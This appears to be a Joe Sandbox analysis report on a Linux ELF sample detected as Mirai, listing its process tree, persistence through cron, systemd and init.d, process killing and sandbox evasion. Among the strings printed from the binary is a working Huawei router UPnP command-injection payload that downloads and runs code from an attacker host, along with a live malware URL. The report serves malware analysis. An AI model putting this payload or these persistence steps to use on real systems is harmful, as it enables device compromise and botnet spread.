Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
3.elf

Overview

General Information

Sample name:3.elf
Analysis ID:1589225
MD5:c618cd5a649b133e94ad21adec9b5d0b
SHA1:bf13ccbb7ac6d6dd809ccab6d82bda3dcb34bf65
SHA256:1603c962cec7082a9464194f32f078a9af6056cda7756aa1f26be5018a55a846
Tags:elfuser-abuse_ch
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Drops files in suspicious directories
Executes the "crontab" command typically for achieving persistence
Sample tries to kill multiple processes (SIGKILL)
Sample tries to persist itself using cron
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "systemctl" command used for controlling the systemd system and service manager
Reads system information from the proc file system
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sleeps for long times indicative of sandbox evasion
Uses the "uname" system call to query kernel version information (possible evasion)
Writes shell script file to disk with an unusual file extension

Classification

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1589225
Start date and time:2025-01-11 21:32:06 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 48s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:3.elf
Detection:MAL
Classification:mal72.spre.troj.evad.linELF@0/6@0/0
  • Skipping network analysis since amount of network traffic is too extensive
  • VT rate limit hit for: http://103.136.41.100/3
Command:/tmp/3.elf
PID:6247
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
gosh that chinese family at the other table sure ate a lot
Standard Error:
  • system is lnxubuntu20
  • 3.elf (PID: 6247, Parent: 6158, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/3.elf
    • 3.elf New Fork (PID: 6258, Parent: 6247)
    • sh (PID: 6258, Parent: 6247, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl daemon-reload > /dev/null 2>&1"
      • sh New Fork (PID: 6263, Parent: 6258)
      • systemctl (PID: 6263, Parent: 6258, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
    • 3.elf New Fork (PID: 6268, Parent: 6247)
    • sh (PID: 6268, Parent: 6247, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl start hello.service > /dev/null 2>&1"
      • sh New Fork (PID: 6280, Parent: 6268)
      • systemctl (PID: 6280, Parent: 6268, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start hello.service
    • 3.elf New Fork (PID: 6281, Parent: 6247)
    • sh (PID: 6281, Parent: 6247, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab /tmp/crontab.tmp > /dev/null 2>&1"
      • sh New Fork (PID: 6283, Parent: 6281)
      • crontab (PID: 6283, Parent: 6281, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab /tmp/crontab.tmp
    • 3.elf New Fork (PID: 6284, Parent: 6247)
    • sh (PID: 6284, Parent: 6247, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/etc/init.d/hello > /dev/null 2>&1"
      • sh New Fork (PID: 6286, Parent: 6284)
    • 3.elf New Fork (PID: 6288, Parent: 6247)
      • 3.elf New Fork (PID: 6290, Parent: 6288)
        • 3.elf New Fork (PID: 6292, Parent: 6290)
        • 3.elf New Fork (PID: 6294, Parent: 6290)
        • 3.elf New Fork (PID: 6296, Parent: 6290)
        • 3.elf New Fork (PID: 6298, Parent: 6290)
        • 3.elf New Fork (PID: 6366, Parent: 6290)
          • 3.elf New Fork (PID: 6368, Parent: 6366)
  • wrapper-2.0 (PID: 6249, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
  • wrapper-2.0 (PID: 6250, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
  • wrapper-2.0 (PID: 6251, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
  • wrapper-2.0 (PID: 6252, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
  • wrapper-2.0 (PID: 6253, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
  • wrapper-2.0 (PID: 6254, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
  • systemd New Fork (PID: 6266, Parent: 6265)
  • snapd-env-generator (PID: 6266, Parent: 6265, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: 3.elfAvira: detected
Source: 3.elfReversingLabs: Detection: 36%
Source: /tmp/3.elf (PID: 6247)Socket: 127.0.0.1:23476Jump to behavior
Source: 3.elfString found in binary or memory: http://%d.%d.%d.%d/%s
Source: 3.elfString found in binary or memory: http://%d.%d.%d.%d/2;
Source: 3.elf, 6247.1.00007fd26c036000.00007fd26c03b000.rw-.sdmp, 3.elf, 6288.1.00007fd26c036000.00007fd26c03b000.rw-.sdmp, 3.elf, 6366.1.00007fd26c036000.00007fd26c03b000.rw-.sdmp, 3.elf, 6368.1.00007fd26c036000.00007fd26c03b000.rw-.sdmpString found in binary or memory: http://1/wget.sh
Source: hello.service.12.dr, hello.12.dr, tmp.VjQhok.40.dr, crontab.tmp.12.drString found in binary or memory: http://103.136.41.100/3
Source: 3.elf, 6247.1.00007fd26c036000.00007fd26c03b000.rw-.sdmp, 3.elf, 6288.1.00007fd26c036000.00007fd26c03b000.rw-.sdmp, 3.elf, 6366.1.00007fd26c036000.00007fd26c03b000.rw-.sdmp, 3.elf, 6368.1.00007fd26c036000.00007fd26c03b000.rw-.sdmpString found in binary or memory: http://9/curl.sh
Source: 3.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 3.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

System Summary

barindex
Source: /tmp/3.elf (PID: 6247)SIGKILL sent: pid: 2018, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6247)SIGKILL sent: pid: 2077, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6247)SIGKILL sent: pid: 2078, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6247)SIGKILL sent: pid: 2079, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6247)SIGKILL sent: pid: 2080, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6247)SIGKILL sent: pid: 2083, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6247)SIGKILL sent: pid: 2084, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6247)SIGKILL sent: pid: 2156, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6247)SIGKILL sent: pid: 6249, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6247)SIGKILL sent: pid: 6250, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6247)SIGKILL sent: pid: 6251, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6247)SIGKILL sent: pid: 6252, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6247)SIGKILL sent: pid: 6253, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6247)SIGKILL sent: pid: 6254, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6368)SIGKILL sent: pid: 6366, result: successfulJump to behavior
Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/*; /bin/busybox wget -g %d.%d.%d.%d -l /tmp/.vs -r /12; /bin/busybox chmod 777 /tmp/.vs; /tmp/.vs huawei.selfrep;)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sampleString containing 'busybox' found: %s%d%s<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/*; /bin/busybox wget -g %d.%d.%d.%d -l /tmp/.vs -r /12; /bin/busybox chmod 777 /tmp/.vs; /tmp/.vs huawei.selfrep;)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Source: ELF static info symbol of initial sample.symtab present: no
Source: /tmp/3.elf (PID: 6247)SIGKILL sent: pid: 2018, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6247)SIGKILL sent: pid: 2077, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6247)SIGKILL sent: pid: 2078, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6247)SIGKILL sent: pid: 2079, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6247)SIGKILL sent: pid: 2080, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6247)SIGKILL sent: pid: 2083, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6247)SIGKILL sent: pid: 2084, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6247)SIGKILL sent: pid: 2156, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6247)SIGKILL sent: pid: 6249, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6247)SIGKILL sent: pid: 6250, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6247)SIGKILL sent: pid: 6251, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6247)SIGKILL sent: pid: 6252, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6247)SIGKILL sent: pid: 6253, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6247)SIGKILL sent: pid: 6254, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6368)SIGKILL sent: pid: 6366, result: successfulJump to behavior
Source: classification engineClassification label: mal72.spre.troj.evad.linELF@0/6@0/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 6283)Crontab executable: /usr/bin/crontab -> crontab /tmp/crontab.tmpJump to behavior
Source: /usr/bin/crontab (PID: 6283)File: /var/spool/cron/crontabs/tmp.VjQhokJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/6231/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/6231/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/6231/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/6231/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/6234/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/6234/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/6234/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/6234/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/1582/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/1582/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/1582/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/1582/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/1582/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/2033/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/2033/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/2033/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/2033/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/2275/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/2275/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/2275/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/2275/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/1612/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/1612/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/1612/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/1612/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/1612/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/1579/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/1579/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/1579/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/1579/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/1579/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/1698/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/1698/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/1698/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/1698/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/1698/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/2028/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/2028/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/2028/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/2028/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/1334/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/1334/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/1334/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/1334/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/1334/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/1576/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/1576/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/1576/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/1576/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/1576/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/2302/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/2302/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/2302/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/2302/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/3236/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/3236/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/3236/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/3236/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/2025/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/2025/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/2025/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/2025/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/2146/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/2146/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/2146/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/2146/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/912/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/912/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/912/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/912/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/912/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/759/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/759/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/759/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/759/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/759/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/2307/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/2307/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/2307/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/2307/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/918/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/918/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/918/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/918/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/918/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/1594/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/1594/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/1594/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/1594/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/1594/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/2285/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/2285/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/2285/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/2285/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/2281/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/2281/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/2281/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6298)File opened: /proc/2281/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6258)Shell command executed: sh -c "systemctl daemon-reload > /dev/null 2>&1"Jump to behavior
Source: /tmp/3.elf (PID: 6268)Shell command executed: sh -c "systemctl start hello.service > /dev/null 2>&1"Jump to behavior
Source: /tmp/3.elf (PID: 6281)Shell command executed: sh -c "crontab /tmp/crontab.tmp > /dev/null 2>&1"Jump to behavior
Source: /tmp/3.elf (PID: 6284)Shell command executed: sh -c "/etc/init.d/hello > /dev/null 2>&1"Jump to behavior
Source: /bin/sh (PID: 6263)Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reloadJump to behavior
Source: /bin/sh (PID: 6280)Systemctl executable: /usr/bin/systemctl -> systemctl start hello.serviceJump to behavior
Source: /tmp/3.elf (PID: 6247)Reads from proc file: /proc/statJump to behavior
Source: /tmp/3.elf (PID: 6247)Writes shell script file to disk with an unusual file extension: /etc/init.d/helloJump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Source: /tmp/3.elf (PID: 6247)File: /etc/init.d/helloJump to dropped file
Source: /tmp/3.elf (PID: 6368)Sleeps longer then 60s: 60.0sJump to behavior
Source: /tmp/3.elf (PID: 6247)Queries kernel information via 'uname': Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6250)Queries kernel information via 'uname': Jump to behavior
Source: 3.elf, 6247.1.00007fffbffe9000.00007fffc000a000.rw-.sdmpBinary or memory string: U/tmp/qemu-open.aderQy:
Source: 3.elf, 6247.1.0000559244b40000.0000559244c91000.rw-.sdmp, 3.elf, 6288.1.0000559244b40000.0000559244c91000.rw-.sdmp, 3.elf, 6366.1.0000559244b40000.0000559244c91000.rw-.sdmp, 3.elf, 6368.1.0000559244b40000.0000559244c91000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/arm
Source: 3.elf, 6247.1.00007fffbffe9000.00007fffc000a000.rw-.sdmpBinary or memory string: /tmp/qemu-open.aderQy
Source: 3.elf, 6247.1.0000559244b40000.0000559244c91000.rw-.sdmp, 3.elf, 6288.1.0000559244b40000.0000559244c91000.rw-.sdmp, 3.elf, 6366.1.0000559244b40000.0000559244c91000.rw-.sdmp, 3.elf, 6368.1.0000559244b40000.0000559244c91000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
Source: 3.elf, 6247.1.00007fffbffe9000.00007fffc000a000.rw-.sdmp, 3.elf, 6288.1.00007fffbffe9000.00007fffc000a000.rw-.sdmp, 3.elf, 6366.1.00007fffbffe9000.00007fffc000a000.rw-.sdmp, 3.elf, 6368.1.00007fffbffe9000.00007fffc000a000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
Source: 3.elf, 6247.1.00007fffbffe9000.00007fffc000a000.rw-.sdmp, 3.elf, 6288.1.00007fffbffe9000.00007fffc000a000.rw-.sdmp, 3.elf, 6366.1.00007fffbffe9000.00007fffc000a000.rw-.sdmp, 3.elf, 6368.1.00007fffbffe9000.00007fffc000a000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/3.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/3.elf
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts1
Scheduled Task/Job
1
Systemd Service
1
Systemd Service
1
Masquerading
1
OS Credential Dumping
11
Security Software Discovery
Remote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network Medium1
Service Stop
CredentialsDomainsDefault AccountsScheduled Task/Job1
Scheduled Task/Job
1
Scheduled Task/Job
1
Virtualization/Sandbox Evasion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
Scripting
Logon Script (Windows)Obfuscated Files or InformationSecurity Account Manager1
System Information Discovery
SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1589225 Sample: 3.elf Startdate: 11/01/2025 Architecture: LINUX Score: 72 56 Antivirus / Scanner detection for submitted sample 2->56 58 Multi AV Scanner detection for submitted file 2->58 9 3.elf 2->9         started        13 xfce4-panel wrapper-2.0 2->13         started        15 xfce4-panel wrapper-2.0 2->15         started        17 5 other processes 2->17 process3 file4 50 /tmp/crontab.tmp, troff 9->50 dropped 52 /etc/init.d/hello, Bourne-Again 9->52 dropped 60 Sample tries to kill multiple processes (SIGKILL) 9->60 62 Drops files in suspicious directories 9->62 19 3.elf sh 9->19         started        21 3.elf 9->21         started        23 3.elf sh 9->23         started        25 2 other processes 9->25 signatures5 process6 process7 27 sh crontab 19->27         started        31 3.elf 21->31         started        33 sh systemctl 23->33         started        35 sh systemctl 25->35         started        37 sh 25->37         started        file8 54 /var/spool/cron/crontabs/tmp.VjQhok, troff 27->54 dropped 64 Sample tries to persist itself using cron 27->64 66 Executes the "crontab" command typically for achieving persistence 27->66 39 3.elf 31->39         started        41 3.elf 31->41         started        43 3.elf 31->43         started        45 2 other processes 31->45 signatures9 process10 process11 47 3.elf 39->47         started        signatures12 68 Sample tries to kill multiple processes (SIGKILL) 47->68

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
3.elf37%ReversingLabsLinux.Trojan.Mirai
3.elf100%AviraEXP/ELF.Mirai.Hua.c
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://103.136.41.100/3100%Avira URL Cloudmalware
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
http://%d.%d.%d.%d/%s3.elffalse
    high
    http://1/wget.sh3.elf, 6247.1.00007fd26c036000.00007fd26c03b000.rw-.sdmp, 3.elf, 6288.1.00007fd26c036000.00007fd26c03b000.rw-.sdmp, 3.elf, 6366.1.00007fd26c036000.00007fd26c03b000.rw-.sdmp, 3.elf, 6368.1.00007fd26c036000.00007fd26c03b000.rw-.sdmpfalse
      high
      http://103.136.41.100/3hello.service.12.dr, hello.12.dr, tmp.VjQhok.40.dr, crontab.tmp.12.drfalse
      • Avira URL Cloud: malware
      unknown
      http://schemas.xmlsoap.org/soap/encoding/3.elffalse
        high
        http://9/curl.sh3.elf, 6247.1.00007fd26c036000.00007fd26c03b000.rw-.sdmp, 3.elf, 6288.1.00007fd26c036000.00007fd26c03b000.rw-.sdmp, 3.elf, 6366.1.00007fd26c036000.00007fd26c03b000.rw-.sdmp, 3.elf, 6368.1.00007fd26c036000.00007fd26c03b000.rw-.sdmpfalse
          high
          http://%d.%d.%d.%d/2;3.elffalse
            high
            http://schemas.xmlsoap.org/soap/envelope/3.elffalse
              high
              No contacted IP infos
              No context
              No context
              No context
              No context
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              /etc/init.d/hello3.elfGet hashmaliciousUnknownBrowse
                Process:/tmp/3.elf
                File Type:Bourne-Again shell script, ASCII text executable
                Category:dropped
                Size (bytes):612
                Entropy (8bit):4.7170674220961875
                Encrypted:false
                SSDEEP:12:i5BpMp5kTMp5Gu+a6IqBnYMG259srxylKNVUdURucTyl:ifpMr8MrPd6IqdYMGAsrxy8bp4
                MD5:3C4DBCFF0BD32482B556EFCE174E24EF
                SHA1:2C7B82C8B7BE17AE635B41FE471F0E37AFBAA76C
                SHA-256:185A23791986C3E568E8329C0462A86235CC8A5C9CA199EF15F8FCE6A95DE73F
                SHA-512:B1FCFD0D2D75E739A94887AF9E9201453CEFEADBABC607F3563F1765C403CE8D8B0D19A4330A1D166B33D0055D726D40DEC82C5CD04DD4BACB7A6036D5DECD77
                Malicious:true
                Joe Sandbox View:
                • Filename: 3.elf, Detection: malicious, Browse
